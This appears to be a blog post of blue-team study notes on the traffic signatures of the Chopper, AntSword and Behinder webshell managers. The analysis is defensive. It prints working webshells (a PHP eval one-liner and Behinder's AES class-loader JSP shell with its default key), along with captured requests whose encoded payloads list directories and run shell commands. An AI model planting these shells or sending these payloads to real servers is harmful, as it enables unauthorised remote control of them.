相关攻防工具的流量特征
前言:蓝队护网面试的时候问到了,这里记录下相关攻防的时候工具或者手段的流量特征学习笔记
菜刀2016的流量特征
php脚本代码
<?php @eval($_POST[1]);?>
第一次的连接请求
可以看到,常规的操作就是用array_map然后配合assert来进行执行其中eval通过base64_decode解码出来的代码
POST /test5.php HTTP/1.1 X-Forwarded-For: 75.240.223.112 Referer: https://yyhb.lousw.net/ Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) Host: yyhb.lousw.net Content-Length: 674 Cache-Control: no-cache Connection: close 1=array_map("ass"."ert",array("ev"."Al(\"\\\$xx%3D\\\"Ba"."SE6"."4_dEc"."OdE\\\";@ev"."al(\\\$xx('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JEQ9ZGlybmFtZShfX0ZJTEVfXyk7JFI9InskRH1cdCI7aWYoc3Vic3RyKCRELDAsMSkhPSIvIil7Zm9yZWFjaChyYW5nZSgiQSIsIloiKSBhcyAkTClpZihpc19kaXIoInskTH06IikpJFIuPSJ7JEx9OiI7fSRSLj0iXHQiOyR1PShmdW5jdGlvbl9leGlzdHMoJ3Bvc2l4X2dldGVnaWQnKSk%2FQHBvc2l4X2dldHB3dWlkKEBwb3NpeF9nZXRldWlkKCkpOicnOyR1c3I9KCR1KT8kdVsnbmFtZSddOkBnZXRfY3VycmVudF91c2VyKCk7JFIuPXBocF91bmFtZSgpOyRSLj0iKHskdXNyfSkiO3ByaW50ICRSOztlY2hvKCJYQFkiKTtkaWUoKTs%3D'));\");"));
base64解码如下所示:
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D=dirname(__FILE__);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("X@Y");die();
正常执行列目录的请求
POST /test5.php HTTP/1.1 X-Forwarded-For: 75.240.223.112 Referer: https://yyhb.lousw.net/ Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) Host: yyhb.lousw.net Content-Length: 792 Cache-Control: no-cache Connection: close 1=array_map("ass"."ert",array("ev"."Al(\"\\\$xx%3D\\\"Ba"."SE6"."4_dEc"."OdE\\\";@ev"."al(\\\$xx('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JEQ9Jy93d3cvd3d3cm9vdC95eWhiLmxvdXN3Lm5ldC8nOyRGPUBvcGVuZGlyKCREKTtpZigkRj09TlVMTCl7ZWNobygiRVJST1I6Ly8gUGF0aCBOb3QgRm91bmQgT3IgTm8gUGVybWlzc2lvbiEiKTt9ZWxzZXskTT1OVUxMOyRMPU5VTEw7d2hpbGUoJE49QHJlYWRkaXIoJEYpKXskUD0kRC4nLycuJE47JFQ9QGRhdGUoIlktbS1kIEg6aTpzIixAZmlsZW10aW1lKCRQKSk7QCRFPXN1YnN0cihiYXNlX2NvbnZlcnQoQGZpbGVwZXJtcygkUCksMTAsOCksLTQpOyRSPSJcdCIuJFQuIlx0Ii5AZmlsZXNpemUoJFApLiJcdCIuJEUuIlxuIjtpZihAaXNfZGlyKCRQKSkkTS49JE4uIi8iLiRSO2Vsc2UgJEwuPSROLiRSO31lY2hvICRNLiRMO0BjbG9zZWRpcigkRik7fTtlY2hvKCJYQFkiKTtkaWUoKTs%3D'));\");"));
opendir配合readdir来进行读取目录文件
base64解码如下
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/www/wwwroot/yyhb.lousw.net/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
whoami执行流量
这个请求在正常的杀毒环境中直接被拦截了,显示如下
POST /test5.php HTTP/1.1 X-Forwarded-For: 75.240.223.112 Referer: https://yyhb.lousw.net/ Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) Host: yyhb.lousw.net Content-Length: 808 Cache-Control: no-cache Connection: close 1=array_map("ass"."ert",array("ev"."Al(\"\\\$xx%3D\\\"Ba"."SE6"."4_dEc"."OdE\\\";@ev"."al(\\\$xx('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JG09Z2V0X21hZ2ljX3F1b3Rlc19ncGMoKTskcD0nL2Jpbi9zaCc7JHM9J2NkIC93d3cvd3d3cm9vdC95eWhiLmxvdXN3Lm5ldC87d2hvYW1pO2VjaG8gW1NdO3B3ZDtlY2hvIFtFXSc7JGQ9ZGlybmFtZSgkX1NFUlZFUlsiU0NSSVBUX0ZJTEVOQU1FIl0pOyRjPXN1YnN0cigkZCwwLDEpPT0iLyI%2FIi1jIFwieyRzfVwiIjoiL2MgXCJ7JHN9XCIiOyRyPSJ7JHB9IHskY30iOyRhcnJheT1hcnJheShhcnJheSgicGlwZSIsInIiKSxhcnJheSgicGlwZSIsInciKSxhcnJheSgicGlwZSIsInciKSk7JGZwPXByb2Nfb3Blbigkci4iIDI%2BJjEiLCRhcnJheSwkcGlwZXMpOyRyZXQ9c3RyZWFtX2dldF9jb250ZW50cygkcGlwZXNbMV0pO3Byb2NfY2xvc2UoJGZwKTtwcmludCAkcmV0OztlY2hvKCJYQFkiKTtkaWUoKTs%3D'));\");"));
base64解码如下,可以看到跟上面不同的是,这里是直接通过proc_open来进行命令,所以才会被直接拦截
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /www/wwwroot/yyhb.lousw.net/;whoami;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
总结流量特征
1、base64字符串的拼接特征
2、@ini_set("display_errors","0") 代码特征对应的base64也就是QGluaV9zZ
3、array_map执行函数特征
蚁剑的流量特征
无混淆加密状态
第一次连接的情况
POST /test.php HTTP/1.1 Host: dvwa.io:80 Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0 Content-Type: application/x-www-form-urlencoded Content-Length: 983 Connection: close 1=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%223addd%22%3Becho%20%40asenc(%24output)%3Becho%20%226595f%22%3B%7Dob_start()%3Btry%7B%24D%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(%24D%3D%3D%22%22)%24D%3Ddirname(%24_SERVER%5B%22PATH_TRANSLATED%22%5D)%3B%24R%3D%22%7B%24D%7D%09%22%3Bif(substr(%24D%2C0%2C1)!%3D%22%2F%22)%7Bforeach(range(%22C%22%2C%22Z%22)as%20%24L)if(is_dir(%22%7B%24L%7D%3A%22))%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D(function_exists(%22posix_getegid%22))%3F%40posix_getpwuid(%40posix_geteuid())%3A%22%22%3B%24s%3D(%24u)%3F%24u%5B%22name%22%5D%3A%40get_current_user()%3B%24R.%3Dphp_uname()%3B%24R.%3D%22%09%7B%24s%7D%22%3Becho%20%24R%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B
url解码格式化内容如下:
<?php @ini_set("display_errors", "0"); @set_time_limit(0); function asenc($out) { return $out; }; function asoutput(){ $output=ob_get_contents(); ob_end_clean(); echo "3addd"; echo @asenc($output); echo "6595f"; } ob_start(); try { $D=dirname($_SERVER["SCRIPT_FILENAME"]); if($D=="") $D=dirname($_SERVER["PATH_TRANSLATED"]); $R="{$D} "; if(substr($D,0,1)!="/") { foreach(range("C","Z")as $L) if(is_dir("{$L}:"))$R.="{$L}:"; }else{ $R.="/"; } $R.=" "; $u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):""; $s=($u)?$u["name"]:@get_current_user(); $R.=php_uname(); $R.=" {$s}"; echo $R;; }catch(Exception $e){ echo "ERROR://".$e->getMessage(); }; asoutput();die();
列目录
POST /test.php HTTP/1.1 Host: dvwa.io:80 Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0 Content-Type: application/x-www-form-urlencoded Content-Length: 1056 Connection: close 1=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%22e3e22%22%3Becho%20%40asenc(%24output)%3Becho%20%22c9124%22%3B%7Dob_start()%3Btry%7B%24D%3Dbase64_decode(%24_POST%5B%220x1a6f8a0c3079a%22%5D)%3B%24F%3D%40opendir(%24D)%3Bif(%24F%3D%3DNULL)%7Becho(%22ERROR%3A%2F%2F%20Path%20Not%20Found%20Or%20No%20Permission!%22)%3B%7Delse%7B%24M%3DNULL%3B%24L%3DNULL%3Bwhile(%24N%3D%40readdir(%24F))%7B%24P%3D%24D.%24N%3B%24T%3D%40date(%22Y-m-d%20H%3Ai%3As%22%2C%40filemtime(%24P))%3B%40%24E%3Dsubstr(base_convert(%40fileperms(%24P)%2C10%2C8)%2C-4)%3B%24R%3D%22%09%22.%24T.%22%09%22.%40filesize(%24P).%22%09%22.%24E.%22%0A%22%3Bif(%40is_dir(%24P))%24M.%3D%24N.%22%2F%22.%24R%3Belse%20%24L.%3D%24N.%24R%3B%7Decho%20%24M.%24L%3B%40closedir(%24F)%3B%7D%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B&0x1a6f8a0c3079a=RDovcGhwc3R1ZHlfcHJvL1dXVy9kdndhLw%3D%3D
解码如下
whoami
POST /test.php HTTP/1.1 Host: dvwa.io:80 Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0 Content-Type: application/x-www-form-urlencoded Content-Length: 1781 Connection: close 1=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%22a7e04%22%3Becho%20%40asenc(%24output)%3Becho%20%22b50a5%22%3B%7Dob_start()%3Btry%7B%24p%3Dbase64_decode(%24_POST%5B%220x6385c50bfea6c%22%5D)%3B%24s%3Dbase64_decode(%24_POST%5B%220x704229de4a3ce%22%5D)%3B%24d%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3B%24c%3Dsubstr(%24d%2C0%2C1)%3D%3D%22%2F%22%3F%22-c%20%5C%22%7B%24s%7D%5C%22%22%3A%22%2Fc%20%5C%22%7B%24s%7D%5C%22%22%3B%24r%3D%22%7B%24p%7D%20%7B%24c%7D%22%3Bfunction%20fe(%24f)%7B%24d%3Dexplode(%22%2C%22%2C%40ini_get(%22disable_functions%22))%3Bif(empty(%24d))%7B%24d%3Darray()%3B%7Delse%7B%24d%3Darray_map('trim'%2Carray_map('strtolower'%2C%24d))%3B%7Dreturn(function_exists(%24f)%26%26is_callable(%24f)%26%26!in_array(%24f%2C%24d))%3B%7D%3Bfunction%20runcmd(%24c)%7B%24ret%3D0%3Bif(fe('system'))%7B%40system(%24c%2C%24ret)%3B%7Delseif(fe('passthru'))%7B%40passthru(%24c%2C%24ret)%3B%7Delseif(fe('shell_exec'))%7Bprint(%40shell_exec(%24c))%3B%7Delseif(fe('exec'))%7B%40exec(%24c%2C%24o%2C%24ret)%3Bprint(join(%22%0A%22%2C%24o))%3B%7Delseif(fe('popen'))%7B%24fp%3D%40popen(%24c%2C'r')%3Bwhile(!%40feof(%24fp))%7Bprint(%40fgets(%24fp%2C%202048))%3B%7D%40pclose(%24fp)%3B%7Delseif(fe('antsystem'))%7B%40antsystem(%24c)%3B%7Delse%7B%24ret%20%3D%20127%3B%7Dreturn%20%24ret%3B%7D%3B%24ret%3D%40runcmd(%24r.%22%202%3E%261%22)%3Bprint%20(%24ret!%3D0)%3F%22ret%3D%7B%24ret%7D%22%3A%22%22%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B&0x6385c50bfea6c=Y21k&0x704229de4a3ce=Y2QgL2QgIkQ6XFxwaHBzdHVkeV9wcm9cXFdXV1xcZHZ3YSImd2hvYW1pJmVjaG8gW1NdJmNkJmVjaG8gW0Vd
解码内容:
@ini_set("display_errors", "0");@set_time_limit(0);function asenc($out){return $out;};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "a7e04";echo @asenc($output);echo "b50a5";}ob_start();try{$p=base64_decode($_POST["0x6385c50bfea6c"]);$s=base64_decode($_POST["0x704229de4a3ce"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";function fe($f){$d=explode(",",@ini_get("disable_functions"));if(empty($d)){$d=array();}else{$d=array_map('trim',array_map('strtolower',$d));}return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));};function runcmd($c){$ret=0;if(fe('system')){@system($c,$ret);}elseif(fe('passthru')){@passthru($c,$ret);}elseif(fe('shell_exec')){print(@shell_exec($c));}elseif(fe('exec')){@exec($c,$o,$ret);print(join(" ",$o));}elseif(fe('popen')){$fp=@popen($c,'r');while(!@feof($fp)){print(@fgets($fp, 2048));}@pclose($fp);}elseif(fe('antsystem')){@antsystem($c);}else{$ret = 127;}return $ret;};$ret=@runcmd($r." 2>&1");print ($ret!=0)?"ret={$ret}":"";;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();
总结
1、可以看到和菜刀有点像其中的一个特征就是@ini_set("display_errors", "0");
2、在执行命令的时候使用了很多执行命令的关键字 array_map passthru shell_exec base_decode
3、前后随机五个字符
拓展知识点
base64加密传输的情况下,如下图所示
可以看到特征同样存在
1、base_decode解码后就存在相关特征
2、传参_0x开头
3、eval特征字符串
新版的蚁剑提供了自定义分隔符的功能,如下图所示
同样也可以将下面三种作为检测特征来进行使用
冰蝎的流量特征
关于冰蝎3.0源码参考:https://github.com/MountCloud/BehinderClientSource
相关issue:https://github.com/MountCloud/BehinderClientSource/issues/8
这里分析的是jsp的木马
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*" %> <%! class U extends ClassLoader { U(ClassLoader c) { super(c); } public Class g(byte[] b) { return super.defineClass(b, 0, b.length); } } %> <% if (request.getMethod().equals("POST")) { String k = "e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/ session.putValue("u", k); Cipher c = Cipher.getInstance("AES"); //解密初始化 c.init(2, new SecretKeySpec(k.getBytes(), "AES")); //解码,解密,初始化,equals new U(this.getClass().getClassLoader()).g( c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext); } %>
知识点:为什么木马中类加载器需要去继承个ClassLoader来进行实现?
继承classloader,调用时返回父类的defineClass方法,就解决了protected的限制
流量观察
参考文章:https://zgao.top/冰蝎v2-0-1-动态二进制加密网站管理客户端源码分析/
冰蝎作者描述的通信流程图,如下图所示
第一次连接
可以看到第一次连接的话有两个数据包,这里就涉及到相关的密钥协商的过程
因为冰蝎进行通信的时候默认数据是通过AES_128来进行加密的
首先先来看第一个数据包
POST /web_demo/shell.jsp HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Content-Type: application/octet-stream Referer: http://127.0.0.1:8080/web_demo/shell.jsp User-Agent: Mozilla/5.0 (Windows NT 6.2; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Pragma: no-cache Host: 127.0.0.1:8080 Content-Length: 10712 Connection: close UdpdzPiwMfQSLKKtRSD8CkZXdpB38xA7sY23E7YQTWrmw8Yjl9T78BEsNzXN9AWwn/l7pp9i0+1/SQALdR2AcFtnpJWjbzQdZ5eN+SsP0vLKJxLseeJoigz8hJpU9O9l+7fO3uuxjWOJkYHzWKb9IGBPvH5VzIj2dn4WjWbDdpUf8dcMBH02e0Q6OcZGE+MHrBqn2zHftNF3UUjqZoj1OHth+WxNh97DOeN60htjugFsRKtm4yd/hgCElPnUzpfX3wkRWlUu8dL/NoQMrBYvaTkLvhLMDS+5yzX8A8xOg8TKUK9HqE8aQj61ZaxTZY6clZd0qQOaTx2ovZdqwtMW4NFBI+OGfWp7kL9HEzOSSbwSNkxi36cINgzqYGLDcikx4xR7+XcchAePPmcW7GRj/zxziCEUS7m+7CqhaOaKee/mTtoHuLSVw0Wmc7JiWnNhKIeGhqWYA1eS0MMSdrq6M/Zn1h5C06ea/A3kV1w1MhnsXDM8xk8H5c4p5bdK4E/wTnTFxkjxnVfJ8+8xS+zgG9HUEgB3FzcOfsTOjEltYoLuEG3gidnjPQpjdn3LRTfdpKBeotMtKUtG9amQ55UsFuw2NmMWpR6zDeebyKrs9AFqHAxB/Tjk0f8H18w1cUaU+uEM..........................忽略
返回的数据包如下所示,可以看到返回包中会返回一个SESSIONID的值 JSESSIONID=ABDDCE88AB67394B2DB7E73A1BAEBDAA
这个SESSION ABDDCE88AB67394B2DB7E73A1BAEBDAA 将作为之后的通信标识符来进行使用
HTTP/1.1 200 Set-Cookie: JSESSIONID=ABDDCE88AB67394B2DB7E73A1BAEBDAA; Path=/web_demo; HttpOnly Content-Type: text/html;charset=UTF-8 Date: Sun, 12 Jun 2022 07:27:48 GMT Connection: close Content-Length: 3104 这里不放上来了,全是乱码
然后再接着就是将这个SESSION作为会话标识,然后接下来继续发送这个数据
到这里第一次连接就结束了,之后的发送数据的就一个数据包就可以完成了
但是这里有个问题数据包加密看不了怎么办,这里可以来进行解密操作,代码如下
public class TestCode { public static void main(String[] args) throws NoSuchPaddingException, NoSuchAlgorithmException, InvalidKeyException, IOException, BadPaddingException, IllegalBlockSizeException { String k = "e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/ Cipher c = Cipher.getInstance("AES"); //解密初始化 c.init(2, new SecretKeySpec(k.getBytes(), "AES")); //解码,解密,初始化,equals byte[] bytes = c.doFinal(new BASE64Decoder().decodeBuffer("客户端请求过去的数据")); System.out.println(new String(bytes)); } }
运行如下,因为上面我们知道它是通过字节码来进行动态加载的,所以要实现真正的看代码的话就需要写入到class文件中来进行反编译操作
public class TestCode { public static void main(String[] args) throws NoSuchPaddingException, NoSuchAlgorithmException, InvalidKeyException, IOException, BadPaddingException, IllegalBlockSizeException { String k = "e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/ Cipher c = Cipher.getInstance("AES"); //解密初始化 c.init(2, new SecretKeySpec(k.getBytes(), "AES")); //解码,解密,初始化,equals byte[] bytes = c.doFinal(new BASE64Decoder().decodeBuffer("加密传输的中数据")); FileOutputStream fileOutputStream = new FileOutputStream(new File("aaa.class")); fileOutputStream.write(bytes); } }
最终解密如下,访问aaa.class文件,如下图所示,实际上在冰蝎源码中对应的就是net.rebeyond.behinder.payload.java.Echo这个模块
此时这段字节码发送过去之后,在webshell中的类加载器就开始发挥作用了
new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance()
上面这段代码就会通过defineClass来进行实例化对应的对象,其实也就是aaa.class中的Xoaf对象,接着就会调用equal方法,这里跟进到aaa.class里面观察equal方法
可以看到equals中就是进行了对应的操作,然后将操作结果进行加密返回write.invoke(so, this.Encrypt(this.buildJson(result, true).getBytes("UTF-8")));
public boolean equals(Object obj) { HashMap result = new HashMap(); boolean var13 = false; Object so; Method write; label95: { try { var13 = true; this.fillContext(obj); result.put("status", "success"); result.put("msg", content); var13 = false; break label95; } catch (Exception var19) { result.put("msg", var19.getMessage()); result.put("status", "success"); var13 = false; } finally { if (var13) { try { so = this.Response.getClass().getMethod("getOutputStream").invoke(this.Response); write = so.getClass().getMethod("write", byte[].class); write.invoke(so, this.Encrypt(this.buildJson(result, true).getBytes("UTF-8"))); so.getClass().getMethod("flush").invoke(so); so.getClass().getMethod("close").invoke(so); } catch (Exception var16) { } } } try { so = this.Response.getClass().getMethod("getOutputStream").invoke(this.Response); write = so.getClass().getMethod("write", byte[].class); write.invoke(so, this.Encrypt(this.buildJson(result, true).getBytes("UTF-8"))); // 对执行的数据进行加密返回 so.getClass().getMethod("flush").invoke(so); so.getClass().getMethod("close").invoke(so); } catch (Exception var17) { } return true; } try { so = this.Response.getClass().getMethod("getOutputStream").invoke(this.Response); write = so.getClass().getMethod("write", byte[].class); write.invoke(so, this.Encrypt(this.buildJson(result, true).getBytes("UTF-8"))); so.getClass().getMethod("flush").invoke(so); so.getClass().getMethod("close").invoke(so); } catch (Exception var18) { } return true; }
上面的那个SESSION是如何体现作用的?如下图所示
可以看到
String k = "e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/ session.putValue("u", k);
解密第二个数据包,跟上面的操作一样,这个数据包是获取相关目标的环境变量信息等。。。
知识点:对应的冰蝎中的源码是net.rebeyond.behinder.payload.java.BasicInfo
命令执行ipconfig
跟上面一样的操作进行解密,可以发现跟第一个aaa.class有点不同,其中不同的地方就是接收数据之后会根据win/linux的环境来进行对应的命令执行,然后对结果进行返回
知识点:实际上在冰蝎源码中对应的就是net.rebeyond.behinder.payload.java.Cmd模块
最后同样的还是将结果数据进行加密返回
流量总结
动作特征:
1、冰蝎默认每6分钟会自动请求一次
2、冰蝎相比起菜刀和蚁剑,第一次通信协商的时候是进行协商密钥,然后第二次进行获取环境变量,连续的两次请求,也可以作为一个特征来进行识别
3、连续时间内,第一次请求完之后,第二次获取环境变量,两次的数据包相差较大,也可以作为一个特征来识别
4、JSP通信的时候都是Content-Type都为application/octet-stream,也可以作为一个特征来进行识别
哥斯拉的流量特征
扩展魔改哥斯拉
参考文章:https://xz.aliyun.com/t/11368
CS的流量特征
burpsuite的流量特征
参考文章:https://juejin.cn/post/7122364903372881950
msf的流量特征
反序列化的流量特征
base64编码传输的情况下,如下图所示 以字符串 rO0ABXkai 开头
hex字节流传输的情况下,可以看到明显的0xaced的开头的十六进制,这个可以作为特征来进行识别反序列化数据
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· winform 绘制太阳,地球,月球 运作规律
· AI与.NET技术实操系列(五):向量存储与相似性搜索在 .NET 中的实现
· 超详细:普通电脑也行Windows部署deepseek R1训练数据并当服务器共享给他人
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 上周热点回顾(3.3-3.9)